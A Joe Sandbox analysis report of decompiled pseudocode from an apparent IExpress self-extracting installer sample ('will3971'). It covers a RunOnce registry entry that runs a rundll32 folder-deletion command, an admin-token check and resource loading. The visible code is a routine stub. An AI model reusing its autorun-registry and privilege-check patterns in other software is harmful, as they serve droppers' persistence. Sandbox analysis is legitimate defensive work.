                                                • RegQueryValueExA.ADVAPI32(?,002F1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F2852
                                                • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F2870
                                                • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F28A0
                                                • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 002F28AA
                                                • GetSystemDirectoryA.KERNEL32 ref: 002F28B9
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 002F27E4
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                • API String ID: 2659952014-2428544900
                                                • Opcode ID: 4abd23b5d69da55bec7afb70cf4452542bc4eef69056d52b0969f9cc0db464a2
                                                • Instruction ID: 956c77a7611c69503f4d9d1095ae00d96d657b83875648e17f7fcc82a87fe7b0
                                                • Opcode Fuzzy Hash: 4abd23b5d69da55bec7afb70cf4452542bc4eef69056d52b0969f9cc0db464a2
                                                • Instruction Fuzzy Hash: 514196B191011CABDB249F64AC89EFAB7BDEB167D0F0040B9E649E2110DB704E95CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 62%
                                                			E002F2267() {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v836;
                                                				void* _v840;
                                                				int _v844;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t19;
                                                				intOrPtr _t33;
                                                				void* _t38;
                                                				intOrPtr* _t42;
                                                				void* _t45;
                                                				void* _t47;
                                                				void* _t49;
                                                				signed int _t51;
                                                
                                                				_t19 =  *0x2f8004; // 0x404cc811
                                                				_t20 = _t19 ^ _t51;
                                                				_v8 = _t19 ^ _t51;
                                                				if( *0x2f8530 != 0) {
                                                					_push(_t49);
                                                					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                						_push(_t38);
                                                						_v844 = 0x238;
                                                						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                							_push(_t47);
                                                							memset( &_v268, 0, 0x104);
                                                							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                								E002F658A( &_v268, 0x104, 0x2f1140);
                                                							}
                                                							_push("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                							E002F171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                							_t42 =  &_v836;
                                                							_t45 = _t42 + 1;
                                                							_pop(_t47);
                                                							do {
                                                								_t33 =  *_t42;
                                                								_t42 = _t42 + 1;
                                                							} while (_t33 != 0);
                                                							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                						}
                                                						_t20 = RegCloseKey(_v840);
                                                						_pop(_t38);
                                                					}
                                                					_pop(_t49);
                                                				}
                                                				return E002F6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                			}



















                                                0x002f2272
                                                0x002f2277
                                                0x002f2279
                                                0x002f2283
                                                0x002f2289
                                                0x002f22ab
                                                0x002f22b1
                                                0x002f22c4
                                                0x002f22e0
                                                0x002f22e6
                                                0x002f22f5
                                                0x002f230d
                                                0x002f231c
                                                0x002f231c
                                                0x002f2321
                                                0x002f233a
                                                0x002f2342
                                                0x002f2348
                                                0x002f234b
                                                0x002f234c
                                                0x002f234c
                                                0x002f234e
                                                0x002f234f
                                                0x002f236e
                                                0x002f236e
                                                0x002f237a
                                                0x002f2380
                                                0x002f2380
                                                0x002f2381
                                                0x002f2381
                                                0x002f238f

                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 002F22A3
                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 002F22D8
                                                • memset.MSVCRT ref: 002F22F5
                                                • GetSystemDirectoryA.KERNEL32 ref: 002F2305
                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 002F236E
                                                • RegCloseKey.ADVAPI32(?), ref: 002F237A
                                                Strings
                                                • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 002F232D
                                                • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 002F2299
                                                • wextract_cleanup3, xrefs: 002F227C, 002F22CD, 002F2363
                                                • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F2321
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
                                                • API String ID: 3027380567-1455616767
                                                • Opcode ID: bd2fe27d6ee805d7558e9c864d192842cb449bcc3a4083b1f3c75458eba2ebc7
                                                • Instruction ID: 320715af129f9fdb2b5a6464f568b10b1f32bbfa362b4d26634488422acbd589
                                                • Opcode Fuzzy Hash: bd2fe27d6ee805d7558e9c864d192842cb449bcc3a4083b1f3c75458eba2ebc7
                                                • Instruction Fuzzy Hash: 2231B671A1021CABDB219B50EC49FFAF77CEB55790F4001F9B60DA6050DE716B98CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E002F3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				void* _t8;
                                                				void* _t11;
                                                				void* _t15;
                                                				struct HWND__* _t16;
                                                				struct HWND__* _t33;
                                                				struct HWND__* _t34;
                                                
                                                				_t8 = _a8 - 0xf;
                                                				if(_t8 == 0) {
                                                					if( *0x2f8590 == 0) {
                                                						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                						 *0x2f8590 = 1;
                                                					}
                                                					L13:
                                                					return 0;
                                                				}
                                                				_t11 = _t8 - 1;
                                                				if(_t11 == 0) {
                                                					L7:
                                                					_push(0);
                                                					L8:
                                                					EndDialog(_a4, ??);
                                                					L9:
                                                					return 1;
                                                				}
                                                				_t15 = _t11 - 0x100;
                                                				if(_t15 == 0) {
                                                					_t16 = GetDesktopWindow();
                                                					_t33 = _a4;
                                                					E002F43D0(_t33, _t16);
                                                					SetDlgItemTextA(_t33, 0x834,  *0x2f8d4c);
                                                					SetWindowTextA(_t33, "lega");
                                                					SetForegroundWindow(_t33);
                                                					_t34 = GetDlgItem(_t33, 0x834);
                                                					 *0x2f88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                					SetWindowLongA(_t34, 0xfffffffc, E002F30C0);
                                                					return 1;
                                                				}
                                                				if(_t15 != 1) {
                                                					goto L13;
                                                				}
                                                				if(_a12 != 6) {
                                                					if(_a12 != 7) {
                                                						goto L9;
                                                					}
                                                					goto L7;
                                                				}
                                                				_push(1);
                                                				goto L8;
                                                			}









                                                0x002f3108
                                                0x002f310b
                                                0x002f31b7
                                                0x002f31ca
                                                0x002f31d0
                                                0x002f31d0
                                                0x002f31da
                                                0x00000000
                                                0x002f31da
                                                0x002f3111
                                                0x002f3114
                                                0x002f3136
                                                0x002f3136
                                                0x002f3138
                                                0x002f313b
                                                0x002f3141
                                                0x00000000
                                                0x002f3143
                                                0x002f3116
                                                0x002f311b
                                                0x002f314b
                                                0x002f3151
                                                0x002f3158
                                                0x002f316a
                                                0x002f3176
                                                0x002f317d
                                                0x002f318b
                                                0x002f319e
                                                0x002f31a3
                                                0x00000000
                                                0x002f31ad
                                                0x002f3120
                                                0x00000000
                                                0x00000000
                                                0x002f312a
                                                0x002f3134
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f3134
                                                0x002f312c
                                                0x00000000

                                                APIs
                                                • EndDialog.USER32(?,00000000), ref: 002F313B
                                                • GetDesktopWindow.USER32 ref: 002F314B
                                                • SetDlgItemTextA.USER32(?,00000834), ref: 002F316A
                                                • SetWindowTextA.USER32(?,lega), ref: 002F3176
                                                • SetForegroundWindow.USER32(?), ref: 002F317D
                                                • GetDlgItem.USER32(?,00000834), ref: 002F3185
                                                • GetWindowLongA.USER32(00000000,000000FC), ref: 002F3190
                                                • SetWindowLongA.USER32(00000000,000000FC,002F30C0), ref: 002F31A3
                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 002F31CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                • String ID: lega
                                                • API String ID: 3785188418-245445314
                                                • Opcode ID: 3295aff41e35f9969c762b4b88edc0b6fbf37dfdd2455a04a52b59a23f807284
                                                • Instruction ID: 25ad47d7bebc89d54c275a8e45abb64448a51e4c695baf912cfe576f33a97174
                                                • Opcode Fuzzy Hash: 3295aff41e35f9969c762b4b88edc0b6fbf37dfdd2455a04a52b59a23f807284
                                                • Instruction Fuzzy Hash: 0011E47122421ABBDB109F24FC0CBBB7A64EB467F0F100230FA1E911E0DBB09661C742
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E002F18A3(void* __edx, void* __esi) {
                                                				signed int _v8;
                                                				short _v12;
                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                				char _v20;
                                                				long _v24;
                                                				void* _v28;
                                                				void* _v32;
                                                				void* __ebx;
                                                				void* __edi;
                                                				signed int _t23;
                                                				long _t45;
                                                				void* _t49;
                                                				int _t50;
                                                				void* _t52;
                                                				signed int _t53;
                                                
                                                				_t51 = __esi;
                                                				_t49 = __edx;
                                                				_t23 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t23 ^ _t53;
                                                				_t25 =  *0x2f8128; // 0x2
                                                				_t45 = 0;
                                                				_v12 = 0x500;
                                                				_t50 = 2;
                                                				_v16.Value = 0;
                                                				_v20 = 0;
                                                				if(_t25 != _t50) {
                                                					L20:
                                                					return E002F6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                				}
                                                				if(E002F17EE( &_v20) != 0) {
                                                					_t25 = _v20;
                                                					if(_v20 != 0) {
                                                						 *0x2f8128 = 1;
                                                					}
                                                					goto L20;
                                                				}
                                                				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                					goto L20;
                                                				}
                                                				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                					L17:
                                                					CloseHandle(_v28);
                                                					_t25 = _v20;
                                                					goto L20;
                                                				} else {
                                                					_push(__esi);
                                                					_t52 = LocalAlloc(0, _v24);
                                                					if(_t52 == 0) {
                                                						L16:
                                                						_pop(_t51);
                                                						goto L17;
                                                					}
                                                					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                						L15:
                                                						LocalFree(_t52);
                                                						goto L16;
                                                					} else {
                                                						if( *_t52 <= 0) {
                                                							L14:
                                                							FreeSid(_v32);
                                                							goto L15;
                                                						}
                                                						_t15 = _t52 + 4; // 0x4
                                                						_t50 = _t15;
                                                						while(EqualSid( *_t50, _v32) == 0) {
                                                							_t45 = _t45 + 1;
                                                							_t50 = _t50 + 8;
                                                							if(_t45 <  *_t52) {
                                                								continue;
                                                							}
                                                							goto L14;
                                                						}
                                                						 *0x2f8128 = 1;
                                                						_v20 = 1;
                                                						goto L14;
                                                					}
                                                				}
                                                			}


















                                                0x002f18a3
                                                0x002f18a3
                                                0x002f18ab
                                                0x002f18b2
                                                0x002f18b5
                                                0x002f18be
                                                0x002f18c0
                                                0x002f18c6
                                                0x002f18c7
                                                0x002f18ca
                                                0x002f18cf
                                                0x002f19c9
                                                0x002f19d8
                                                0x002f19d8
                                                0x002f18df
                                                0x002f19b8
                                                0x002f19bd
                                                0x002f19bf
                                                0x002f19bf
                                                0x00000000
                                                0x002f19bd
                                                0x002f18fa
                                                0x00000000
                                                0x00000000
                                                0x002f1912
                                                0x002f19aa
                                                0x002f19ad
                                                0x002f19b3
                                                0x00000000
                                                0x002f1927
                                                0x002f1927
                                                0x002f1932
                                                0x002f1936
                                                0x002f19a9
                                                0x002f19a9
                                                0x00000000
                                                0x002f19a9
                                                0x002f194c
                                                0x002f19a2
                                                0x002f19a3
                                                0x00000000
                                                0x002f196e
                                                0x002f1970
                                                0x002f1999
                                                0x002f199c
                                                0x00000000
                                                0x002f199c
                                                0x002f1972
                                                0x002f1972
                                                0x002f1975
                                                0x002f1984
                                                0x002f1985
                                                0x002f198a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f198c
                                                0x002f1991
                                                0x002f1996
                                                0x00000000
                                                0x002f1996
                                                0x002f194c

                                                APIs
                                                  • Part of subcall function 002F17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,002F18DD), ref: 002F181A
                                                  • Part of subcall function 002F17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 002F182C
                                                  • Part of subcall function 002F17EE: AllocateAndInitializeSid.ADVAPI32(002F18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,002F18DD), ref: 002F1855
                                                  • Part of subcall function 002F17EE: FreeSid.ADVAPI32(?,?,?,?,002F18DD), ref: 002F1883
                                                  • Part of subcall function 002F17EE: FreeLibrary.KERNEL32(00000000,?,?,?,002F18DD), ref: 002F188A
                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 002F18EB
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 002F18F2
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 002F190A
                                                • GetLastError.KERNEL32 ref: 002F1918
                                                • LocalAlloc.KERNEL32(00000000,?,?), ref: 002F192C
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 002F1944
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 002F1964
                                                • EqualSid.ADVAPI32(00000004,?), ref: 002F197A
                                                • FreeSid.ADVAPI32(?), ref: 002F199C
                                                • LocalFree.KERNEL32(00000000), ref: 002F19A3
                                                • CloseHandle.KERNEL32(?), ref: 002F19AD
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                • String ID:
                                                • API String ID: 2168512254-0
                                                • Opcode ID: dd8e1acf3773dc844d3b6bf0c66c8f6d8fd4f26cd23fc1af922b93694e9dcf69
                                                • Instruction ID: 67033d1ac67db5205a7742d6a2e72e41c10db99efdb168663f8ed33c0115e379
                                                • Opcode Fuzzy Hash: dd8e1acf3773dc844d3b6bf0c66c8f6d8fd4f26cd23fc1af922b93694e9dcf69
                                                • Instruction Fuzzy Hash: 75311B71A1020AEFDB109FA5EC58ABFBBB8FF04790B504439E649D2150DB709925DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E002F468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                				long _t4;
                                                				void* _t11;
                                                				CHAR* _t14;
                                                				void* _t15;
                                                				long _t16;
                                                
                                                				_t14 = __ecx;
                                                				_t11 = __edx;
                                                				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                				_t16 = _t4;
                                                				if(_t16 <= _a4 && _t11 != 0) {
                                                					if(_t16 == 0) {
                                                						L5:
                                                						return 0;
                                                					}
                                                					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                					if(_t15 == 0) {
                                                						goto L5;
                                                					}
                                                					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                					FreeResource(_t15);
                                                					return _t16;
                                                				}
                                                				return _t4;
                                                			}








                                                0x002f4699
                                                0x002f469b
                                                0x002f46a9
                                                0x002f46af
                                                0x002f46b4
                                                0x002f46bc
                                                0x002f46f9
                                                0x00000000
                                                0x002f46f9
                                                0x002f46d9
                                                0x002f46dd
                                                0x00000000
                                                0x00000000
                                                0x002f46e5
                                                0x002f46ef
                                                0x00000000
                                                0x002f46f5
                                                0x002f46ff

                                                APIs
                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
                                                • SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
                                                • LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
                                                • LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
                                                • memcpy_s.MSVCRT ref: 002F46E5
                                                • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                • String ID: TITLE$lega
                                                • API String ID: 3370778649-934471404
                                                • Opcode ID: 0c41a8444e2a82701f712d7aa0a460ecdf8a3d625c05242d0c58b642919179e6
                                                • Instruction ID: 33098e0d860654e48e12f521f5244209c6459a04499ec665cce9a932fb925ddf
                                                • Opcode Fuzzy Hash: 0c41a8444e2a82701f712d7aa0a460ecdf8a3d625c05242d0c58b642919179e6
                                                • Instruction Fuzzy Hash: 9B01A2722402057BE3102BA57C4CF3B7E2CDB8ABF1F040134FB4DC6140D9A19850C6A6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E002F681F(void* __ebx) {
                                                				signed int _v8;
                                                				char _v20;
                                                				struct _OSVERSIONINFOA _v168;
                                                				void* _v172;
                                                				int* _v176;
                                                				int _v180;
                                                				int _v184;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t19;
                                                				long _t31;
                                                				signed int _t35;
                                                				void* _t36;
                                                				intOrPtr _t41;
                                                				signed int _t44;
                                                
                                                				_t36 = __ebx;
                                                				_t19 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t19 ^ _t44;
                                                				_t41 =  *0x2f81d8; // 0xfffffffe
                                                				_t43 = 0;
                                                				_v180 = 0xc;
                                                				_v176 = 0;
                                                				if(_t41 == 0xfffffffe) {
                                                					 *0x2f81d8 = 0;
                                                					_v168.dwOSVersionInfoSize = 0x94;
                                                					if(GetVersionExA( &_v168) == 0) {
                                                						L12:
                                                						_t41 =  *0x2f81d8; // 0xfffffffe
                                                					} else {
                                                						_t41 = 1;
                                                						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                							goto L12;
                                                						} else {
                                                							_t31 = RegQueryValueExA(_v172, 0x2f1140, 0,  &_v184,  &_v20,  &_v180);
                                                							_t43 = _t31;
                                                							RegCloseKey(_v172);
                                                							if(_t31 != 0) {
                                                								goto L12;
                                                							} else {
                                                								_t40 =  &_v176;
                                                								if(E002F66F9( &_v20,  &_v176) == 0) {
                                                									goto L12;
                                                								} else {
                                                									_t35 = _v176 & 0x000003ff;
                                                									if(_t35 == 1 || _t35 == 0xd) {
                                                										 *0x2f81d8 = _t41;
                                                									} else {
                                                										goto L12;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_t18 =  &_v8; // 0x2f463b
                                                				return E002F6CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                			}


















                                                0x002f681f
                                                0x002f682a
                                                0x002f6831
                                                0x002f6836
                                                0x002f683c
                                                0x002f683e
                                                0x002f6848
                                                0x002f6851
                                                0x002f685d
                                                0x002f6864
                                                0x002f6876
                                                0x002f693a
                                                0x002f693a
                                                0x002f687c
                                                0x002f687e
                                                0x002f6885
                                                0x00000000
                                                0x002f68d6
                                                0x002f68f4
                                                0x002f6900
                                                0x002f6902
                                                0x002f690a
                                                0x00000000
                                                0x002f690c
                                                0x002f690c
                                                0x002f691c
                                                0x00000000
                                                0x002f691e
                                                0x002f6924
                                                0x002f692b
                                                0x002f6932
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f692b
                                                0x002f691c
                                                0x002f690a
                                                0x002f6885
                                                0x002f6876
                                                0x002f6940
                                                0x002f6951

                                                APIs
                                                • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 002F686E
                                                • GetSystemMetrics.USER32(0000004A), ref: 002F68A7
                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 002F68CC
                                                • RegQueryValueExA.ADVAPI32(?,002F1140,00000000,?,?,0000000C), ref: 002F68F4
                                                • RegCloseKey.ADVAPI32(?), ref: 002F6902
                                                  • Part of subcall function 002F66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,002F691A), ref: 002F6741
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                • String ID: ;F/$Control Panel\Desktop\ResourceLocale
                                                • API String ID: 3346862599-1584524354
                                                • Opcode ID: 97dc58a369f0656e276f712f599a4850248c9c7bf2919b2b442b52fcdb2ee543
                                                • Instruction ID: 75dce2d3f564ddadea8dee4f69f8767f495107f3b1b6d0b2a5a9f53ce218edbb
                                                • Opcode Fuzzy Hash: 97dc58a369f0656e276f712f599a4850248c9c7bf2919b2b442b52fcdb2ee543
                                                • Instruction Fuzzy Hash: 9E317F71A1021D9FDB218F11EC0ABBAF7BCEB457A4F0401B9EA4DA3140DB709995CF52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 57%
                                                			E002F17EE(intOrPtr* __ecx) {
                                                				signed int _v8;
                                                				short _v12;
                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                				_Unknown_base(*)()* _v20;
                                                				void* _v24;
                                                				intOrPtr* _v28;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t14;
                                                				_Unknown_base(*)()* _t20;
                                                				long _t28;
                                                				void* _t35;
                                                				struct HINSTANCE__* _t36;
                                                				signed int _t38;
                                                				intOrPtr* _t39;
                                                
                                                				_t14 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t14 ^ _t38;
                                                				_v12 = 0x500;
                                                				_t37 = __ecx;
                                                				_v16.Value = 0;
                                                				_v28 = __ecx;
                                                				_t28 = 0;
                                                				_t36 = LoadLibraryA("advapi32.dll");
                                                				if(_t36 != 0) {
                                                					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                					_v20 = _t20;
                                                					if(_t20 != 0) {
                                                						 *_t37 = 0;
                                                						_t28 = 1;
                                                						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                							_t37 = _t39;
                                                							 *0x2fa288(0, _v24, _v28);
                                                							_v20();
                                                							if(_t39 != _t39) {
                                                								asm("int 0x29");
                                                							}
                                                							FreeSid(_v24);
                                                						}
                                                					}
                                                					FreeLibrary(_t36);
                                                				}
                                                				return E002F6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                			}



















                                                0x002f17f6
                                                0x002f17fd
                                                0x002f1805
                                                0x002f180b
                                                0x002f180d
                                                0x002f1815
                                                0x002f1818
                                                0x002f1820
                                                0x002f1824
                                                0x002f182c
                                                0x002f1832
                                                0x002f1837
                                                0x002f1851
                                                0x002f1854
                                                0x002f185d
                                                0x002f1862
                                                0x002f186c
                                                0x002f1872
                                                0x002f1877
                                                0x002f187e
                                                0x002f187e
                                                0x002f1883
                                                0x002f1883
                                                0x002f185d
                                                0x002f188a
                                                0x002f188a
                                                0x002f18a2

                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,002F18DD), ref: 002F181A
                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 002F182C
                                                • AllocateAndInitializeSid.ADVAPI32(002F18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,002F18DD), ref: 002F1855
                                                • FreeSid.ADVAPI32(?,?,?,?,002F18DD), ref: 002F1883
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,002F18DD), ref: 002F188A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
